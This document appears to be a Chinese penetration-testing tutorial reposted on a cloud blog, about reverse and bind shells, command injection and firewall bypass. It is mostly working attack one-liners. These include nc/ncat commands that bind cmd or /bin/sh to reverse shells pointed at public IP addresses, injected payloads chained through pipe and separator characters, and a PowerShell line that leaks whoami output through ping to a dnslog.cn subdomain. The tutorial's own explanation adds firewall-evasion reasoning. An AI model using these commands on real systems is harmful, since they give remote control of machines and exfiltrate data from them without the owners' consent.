基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

本文涉及的产品
云防火墙,500元 1000GB
简介: 基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

常规基本渗透命令详解

https://blog.csdn.net/weixin_43303273/article/details/83029138


实用案例1:文件上传下载-解决无图形化&解决数据传输

命令生成:https://forum.ywhack.com/bountytips.php?download

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等


实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

命令生成:https://forum.ywhack.com/shell.php

NC(ncat)瑞士军刀:linux系统下自带,windows下需要下载。


1、正向连接:本地监听等待对方连接

Linux控制Windows

//绑定CMD到本地5566端口

nc -e cmd -lvvp 5566

//主动连接目标5566

nc 10.10.10.1 5566


Windows控制Linux

//绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566

//主动连接目标5566

nc 10.10.10.1 5566

2、反向连接:主动给出去,对方监听

//绑定CMD到目标5566端口

ncat -e /bin/sh x.x.x.x 5566 linux反弹windows上

//等待5566连接

nc -lvvp 5566


//绑定CMD到目标5566端口

nc -e cmd 10.10.10.146 5566 windows 反弹linux

//等待5566连接

ncat -lvvp 5566


实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

管道符| (管道符号 ) ||(逻辑或) &&(逻辑与) &(后台任务符号)


Windows->| & || &&


Linux->; | || & && ``(特有``和;)


例子:


ping -c 1 127.0.0.1 ; whoami

ping -c 1 127.0.0.1 | whoami

ping -c 1 127.0.0.1 || whoami

ping -c 1 127.0.0.1 & whoami

ping -c 1 127.0.0.1 && whoami

ping -c 1 127.0.0.1 `whoami`


判断windows


windows没有自带的nc


想办法上传nc 反弹权限


反弹


开启入站策略,采用反向连接


Linux:ncat -lvvp 5566


Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566


开启出站策略,采用正向连接


Linux:ncat -e cmd 47.122.23.131 5566


Windows:127.0.0.1 | nc -e cmd -lvvp 5566


正反向反弹案例-内网服务器


只能内网主动交出数据,反向连接


实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

DNSLog Platform


出站入站都开启策略(数据不回显):OSI网络七层


ping 127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='5t4zre.dnslog.cn';$z=$x+$y;ping $z


有,但是数据不回显(开启了防火墙):

1、反弹shell

2、带外查询

为什么要这样写?

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量


结果带有“\” 导致ping无法执行


powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z


127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z


为什么开启防火墙后 whoami数据还是可以带外回显?

ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,

但是ICMP是网络层,是传输层下层,不受防火墙影响。所以可以使用ping命令将数据带出。


相关文章
|
4月前
|
Shell Linux Windows
nc简单反弹shell
该内容描述了在Windows和Linux环境中使用`nc`(Netcat)工具建立反弹shell的过程。在Windows上,反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP;控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下,类似地,使用`nc -l -v -p 端口`作为控制端,而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
116 0
|
30天前
|
Ubuntu Shell 网络安全
安装了ubuntu虚拟机后发现shell无法连接 ubuntu开启ssh连接
【8月更文挑战第23天】安装了ubuntu虚拟机后发现shell无法连接
87 6
|
19天前
|
机器学习/深度学习 安全 网络协议
Linux防火墙iptables命令管理入门
本文介绍了关于Linux防火墙iptables命令管理入门的教程,涵盖了iptables的基本概念、语法格式、常用参数、基础查询操作以及链和规则管理等内容。
178 73
|
26天前
|
分布式计算 资源调度 Hadoop
Hadoop入门基础(五):Hadoop 常用 Shell 命令一网打尽,提升你的大数据技能!
Hadoop入门基础(五):Hadoop 常用 Shell 命令一网打尽,提升你的大数据技能!
|
30天前
|
Java Shell Linux
【Linux入门技巧】新员工必看:用Shell脚本轻松解析应用服务日志
关于如何使用Shell脚本来解析Linux系统中的应用服务日志,提供了脚本实现的详细步骤和技巧,以及一些Shell编程的技能扩展。
24 0
【Linux入门技巧】新员工必看:用Shell脚本轻松解析应用服务日志
|
18天前
|
存储 Ubuntu Shell
shell 用法入门
本文档详细介绍了Shell脚本的基础知识,包括基本写法、变量定义与使用、命令置换、环境变量、数组操作、算术运算、输入输出处理、控制语句及循环结构等内容。文档还提供了丰富的示例代码,帮助读者更好地理解和掌握Shell编程技巧。此外,还介绍了如何使用`if`语句进行条件判断、`case`语句进行模式匹配以及`while`、`for`循环等控制结构。最后,文档还涵盖了函数定义与调用的方法。适合初学者和有一定基础的开发者参考学习。
|
1月前
|
安全 网络协议 网络安全
入门防火墙基本原理,还是得看这篇!小白一看就懂!
入门防火墙基本原理,还是得看这篇!小白一看就懂!
|
2月前
|
监控 安全 网络安全
|
3月前
|
安全 网络协议 Linux
【内网安全】 隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
【内网安全】 隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
|
4月前
|
监控 关系型数据库 Shell
Shell脚本入门:从基础到实践,轻松掌握Shell编程
Shell脚本入门:从基础到实践,轻松掌握Shell编程
118 3